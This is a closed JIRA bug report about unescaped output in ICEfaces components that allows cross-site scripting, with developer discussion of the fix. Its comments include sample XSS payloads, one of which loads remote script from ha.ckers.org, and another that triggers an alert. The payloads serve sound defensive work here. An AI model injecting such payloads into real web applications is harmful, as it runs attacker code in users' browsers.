[ICE-5854] Output components don't escape JavaScript - ICEsoft JIRA Issue Tracker

Details

Type: Bug
Status: Closed
Priority: Major
Resolution: Fixed
Affects Version/s: 1.8.2-EE-GA_P01, 2.0-Beta2
Fix Version/s: 2.0.0
Component/s: Framework, ICE-Components
Labels:
None
Environment:
All

Workaround Exists:

Yes
Workaround Description:

Hide
Escape the value before passing it in:

import com.icesoft.faces.util.DOMUtils;

escaped = DOMUtils.escapeAnsi(value);

Show
Escape the value before passing it in: import com.icesoft.faces.util.DOMUtils; escaped = DOMUtils.escapeAnsi(value);

Description

The ICEfaces output component are not escaped by default which makes them vulnerable to cross site scripting attacks. The <ice:outputText> uses the escape attribute but the other output components do not (ex: <ice:selectOneMenu/>). Doing a test in a pure JSF application reveals that the JSF framework by default filters/escapes JavaScript by default.

Options
- Sort By Name
- Sort By Date
- Ascending
- Descending
- Download All

Attachments

Hide
Case9225Example.war

29/Jun/10 2:31 PM

6.33 MB

Arran Mccullough
META-INF/MANIFEST.MF 0.1 kB

META-INF/context.xml 0.1 kB

WEB-INF/classes/.../example/TestBean.class 1.0 kB

WEB-INF/faces-config.xml 0.9 kB

WEB-INF/lib/FastInfoset.jar 285 kB

WEB-INF/lib/backport-util-concurrent.jar 319 kB

WEB-INF/lib/commons-beanutils.jar 226 kB

WEB-INF/lib/commons-collections.jar 558 kB

WEB-INF/lib/commons-digester.jar 140 kB

WEB-INF/lib/commons-discovery.jar 75 kB

WEB-INF/lib/commons-el.jar 110 kB

WEB-INF/lib/commons-fileupload.jar 56 kB

WEB-INF/lib/commons-lang.jar 240 kB

WEB-INF/lib/commons-logging.jar 52 kB

WEB-INF/lib/icefaces-comps.jar 1.96 MB

WEB-INF/lib/icefaces.jar 1.20 MB

WEB-INF/lib/jsf-api-1.2.jar 352 kB

WEB-INF/lib/jsf-impl-1.2.jar 822 kB

WEB-INF/web.xml 3 kB

display-listbox-page.jspx 1 kB

display-page.jspx 1.0 kB

index.jsp 0.1 kB

main.jspx 1 kB

page.jspx 0.9 kB

Download Zip
Show

Case9225Example.war

29/Jun/10 2:31 PM

6.33 MB

Arran Mccullough
Hide
Case9225Example2.war

29/Jun/10 2:27 PM

2.25 MB

Arran Mccullough
META-INF/MANIFEST.MF 0.1 kB

META-INF/context.xml 0.1 kB

WEB-INF/classes/.../example/TestBean.class 1.0 kB

WEB-INF/faces-config.xml 1 kB

WEB-INF/lib/commons-beanutils.jar 113 kB

WEB-INF/lib/commons-collections.jar 162 kB

WEB-INF/lib/commons-digester.jar 104 kB

WEB-INF/lib/commons-logging.jar 30 kB

WEB-INF/lib/jsf-api.jar 312 kB

WEB-INF/lib/jsf-impl.jar 1.14 MB

WEB-INF/lib/jstl.jar 20 kB

WEB-INF/lib/standard.jar 380 kB

WEB-INF/web.xml 0.8 kB

display-listbox-page.jsp 1.0 kB

display-page.jsp 0.8 kB

welcomeJSF.jsp 1 kB

Download Zip
Show

Case9225Example2.war

29/Jun/10 2:27 PM

2.25 MB

Arran Mccullough
Hide
Case9225ExampleCode.zip

29/Jun/10 2:32 PM

36 kB

Arran Mccullough
Case9225Example2/build.xml 3 kB

Case9225Example2/.../ant-deploy.xml 2 kB

Case9225Example2/.../build-impl.xml 46 kB

Case9225Example2/.../faces-config.NavData 0.3 kB

Case9225Example2/.../genfiles.properties 0.5 kB

Case9225Example2/.../private.properties 2 kB

Case9225Example2/nbproject/.../private.xml 0.2 kB

Case9225Example2/.../project.properties 2 kB

Case9225Example2/nbproject/project.xml 1 kB

Case9225Example2/src/conf/MANIFEST.MF 0.0 kB

Case9225Example2/src/.../TestBean.java 0.6 kB

Case9225Example2/.../display-listbox-page.jsp 1.0 kB

Case9225Example2/web/display-page.jsp 0.8 kB

Case9225Example2/web/.../context.xml 0.1 kB

Case9225Example2/web/.../faces-config.xml 1 kB

Case9225Example2/web/WEB-INF/web.xml 0.8 kB

Case9225Example2/web/welcomeJSF.jsp 1 kB

Case9225Example/build.xml 3 kB

Case9225Example/nbproject/ant-deploy.xml 2 kB

Case9225Example/nbproject/build-impl.xml 46 kB

Case9225Example/.../faces-config.NavData 0.7 kB

Case9225Example/.../genfiles.properties 0.5 kB

Case9225Example/.../private.properties 2 kB

Case9225Example/nbproject/.../private.xml 0.2 kB

Case9225Example/.../project.properties 2 kB

Case9225Example/nbproject/project.xml 0.9 kB

Case9225Example/src/conf/MANIFEST.MF 0.0 kB

Case9225Example/src/.../TestBean.java 0.6 kB

Case9225Example/.../display-listbox-page.jspx 1 kB

Case9225Example/web/display-page.jspx 1.0 kB

Showing 30 of 36 items Download Zip
Show

Case9225ExampleCode.zip

29/Jun/10 2:32 PM

36 kB

Arran Mccullough
Hide
showcase-additions.zip

10/Nov/10 4:43 PM

4 kB

Ted Goddard
display-listbox-page.xhtml 1 kB

display-page.xhtml 0.9 kB

main.xhtml 1 kB

page.xhtml 0.9 kB

WEB-INF/faces-config.xml 3 kB

WEB-INF/classes/.../example/TestBean.class 1.0 kB

Download Zip
Show

showcase-additions.zip

10/Nov/10 4:43 PM

4 kB

Ted Goddard

Activity

Ascending order - Click to sort in descending order

Hide

Permalink

Arran Mccullough added a comment - 29/Jun/10 2:27 PM

Case9225Example.war = JSF example

Show

Arran Mccullough added a comment - 29/Jun/10 2:27 PM Case9225Example.war = JSF example

Hide

Permalink

Arran Mccullough added a comment - 29/Jun/10 2:31 PM

Case9225Example.war = ICEfaces example

Show

Arran Mccullough added a comment - 29/Jun/10 2:31 PM Case9225Example.war = ICEfaces example

Hide

Permalink

Arran Mccullough added a comment - 29/Jun/10 2:32 PM

Project source code

Show

Arran Mccullough added a comment - 29/Jun/10 2:32 PM Project source code

Hide

Permalink

Arran Mccullough added a comment - 29/Jun/10 2:33 PM

Sample cross site script:
"<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>";

Show

Arran Mccullough added a comment - 29/Jun/10 2:33 PM Sample cross site script: "<SCRIPT SRC= http://ha.ckers.org/xss.js ></SCRIPT>";

Hide

Permalink

Greg Dick added a comment - 05/Jul/10 12:05 PM

The attached cases are built for glassfish.

Show

Greg Dick added a comment - 05/Jul/10 12:05 PM The attached cases are built for glassfish.

Hide

Permalink

Ted Goddard added a comment - 05/Jul/10 4:44 PM

It may be possible to use DOM userData to indicate whether a given text node should be escaped on output or not.

Show

Ted Goddard added a comment - 05/Jul/10 4:44 PM It may be possible to use DOM userData to indicate whether a given text node should be escaped on output or not.

Hide

Permalink

Mark Collette added a comment - 06/Jul/10 3:35 PM

We could add a method to DOMUtils, which would check a context param, and then conditionally call DOMUtils.escapeAnsi. In ICEfaces 1.8.2, the default would be to not escape, and in ICEfaces 2, the default would be to do escaping. In either release, escaping can be enabled or disabled. Then, all of the DOM API compat components, that erroneously do not do escaping, would be modified to use this new method. We would just search for the DOM API usage where text nodes are created, and add this, where appropriate. That way backwards compatibility can be preserved, and security enhanced (mutually exclusively).

Show

Mark Collette added a comment - 06/Jul/10 3:35 PM We could add a method to DOMUtils, which would check a context param, and then conditionally call DOMUtils.escapeAnsi . In ICEfaces 1.8.2, the default would be to not escape, and in ICEfaces 2, the default would be to do escaping. In either release, escaping can be enabled or disabled. Then, all of the DOM API compat components, that erroneously do not do escaping, would be modified to use this new method. We would just search for the DOM API usage where text nodes are created, and add this, where appropriate. That way backwards compatibility can be preserved, and security enhanced (mutually exclusively).

Hide

Permalink

Ken Fyten added a comment - 07/Jul/10 10:13 AM

Customer comment/suggestion:

Created By: Markus Günther (07/07/2010 1:07 AM)
Hi, in the meantime we have added explicit filtering of the input and output in all getter and setters of the application. Of course it would be helpful if such a task is treated by the library as it is general stuff which must be applied to almost all GUI input and output controls.

We 've implemented this by usage of the official OWASP ESAPI library which is common availalbe and does this job. I would recommend IceFaces to add such functionality in a future release as this is more and more a very hot issue for web applications and most developers are not aware of that. So it is a big plus using the library (eg. only for IceFacesEE users .

See: http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API

Please let me know once you have a decision how you proceed with this security issue.

Show

Ken Fyten added a comment - 07/Jul/10 10:13 AM Customer comment/suggestion: Created By: Markus Günther (07/07/2010 1:07 AM) Hi, in the meantime we have added explicit filtering of the input and output in all getter and setters of the application. Of course it would be helpful if such a task is treated by the library as it is general stuff which must be applied to almost all GUI input and output controls. We 've implemented this by usage of the official OWASP ESAPI library which is common availalbe and does this job. I would recommend IceFaces to add such functionality in a future release as this is more and more a very hot issue for web applications and most developers are not aware of that. So it is a big plus using the library (eg. only for IceFacesEE users . See: http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API Please let me know once you have a decision how you proceed with this security issue.

Hide

Permalink

Ted Goddard added a comment - 04/Nov/10 12:13 PM

Investigate compat to determine if the concern remains with ICEfaces 2.0.

Show

Ted Goddard added a comment - 04/Nov/10 12:13 PM Investigate compat to determine if the concern remains with ICEfaces 2.0.

Hide

Permalink

Ted Goddard added a comment - 10/Nov/10 4:43 PM

Verified problem to still be present with ICEfaces 2.0 compat.

For instance, the following string will result in script execution when set on the selectOne:

Show

Ted Goddard added a comment - 10/Nov/10 4:43 PM Verified problem to still be present with ICEfaces 2.0 compat. For instance, the following string will result in script execution when set on the selectOne: <script>alert('hello')</script>

Hide

Permalink

Ted Goddard added a comment - 10/Nov/10 4:43 PM

Attached file can be unzipped in component-showcase expanded directory to reproduce the problem.

Show

Ted Goddard added a comment - 10/Nov/10 4:43 PM Attached file can be unzipped in component-showcase expanded directory to reproduce the problem.

Hide

Permalink

Ted Goddard added a comment - 10/Nov/10 5:14 PM

Code from compat/core/src/main/java/com/icesoft/faces/renderkit/dom_html_basic/MenuRenderer.java

Text labelNode = doc.createTextNode(label == null ? valueString : label);

A DOM Text object is created directly from the component valueString. Most calls to createTextNode are invoked via domContext.createTextNode(), many are of the form

domContext.getDocument().createTextNode(detail);

The legacy DOMContext API could be modified to perform escaping and the few remaining cases that operate on the DOM directly could be replaced with DOMContext versions.

Show

Ted Goddard added a comment - 10/Nov/10 5:14 PM Code from compat/core/src/main/java/com/icesoft/faces/renderkit/dom_html_basic/MenuRenderer.java Text labelNode = doc.createTextNode(label == null ? valueString : label); A DOM Text object is created directly from the component valueString. Most calls to createTextNode are invoked via domContext.createTextNode(), many are of the form domContext.getDocument().createTextNode(detail); The legacy DOMContext API could be modified to perform escaping and the few remaining cases that operate on the DOM directly could be replaced with DOMContext versions.

Hide

Permalink

Ted Goddard added a comment - 15/Nov/10 3:15 PM

Compat components have been modified to use createTextNodeUnescaped only when necessary. Note that there are possible script injection attacks through some of the scripts generated by components, for instance:

Ice.FCKeditor.register ('iceform:iceInpRchTxt', new Ice.FCKeditor('iceform:iceInpRchTxt', 'en', '', '/component-showcase/icefaces/resource/LTQ5MTYyMDg1Mw==/','600', '275', 'Default', 'null', 'silver'))

The 'null' in the above consists of options passed to the editor component. If these options are dynamically generated from user input, there is the possibility of script injection attacks.

Show

Ted Goddard added a comment - 15/Nov/10 3:15 PM Compat components have been modified to use createTextNodeUnescaped only when necessary. Note that there are possible script injection attacks through some of the scripts generated by components, for instance: Ice.FCKeditor.register ('iceform:iceInpRchTxt', new Ice.FCKeditor('iceform:iceInpRchTxt', 'en', '', '/component-showcase/icefaces/resource/LTQ5MTYyMDg1Mw==/','600', '275', 'Default', 'null', 'silver')) The 'null' in the above consists of options passed to the editor component. If these options are dynamically generated from user input, there is the possibility of script injection attacks.

Hide

Permalink

Ted Goddard added a comment - 15/Nov/10 3:16 PM

The fix was not overly complex and could be back-ported to ICEfaces 1.8 if required.

Show

Ted Goddard added a comment - 15/Nov/10 3:16 PM The fix was not overly complex and could be back-ported to ICEfaces 1.8 if required.

People

Assignee:

Ted Goddard

Reporter:

Arran Mccullough

Votes:

0 Vote for this issue

Watchers:

0 Start watching this issue

Dates

Created:

29/Jun/10 2:25 PM

Updated:

03/Jan/11 4:19 PM

Resolved:

15/Nov/10 3:15 PM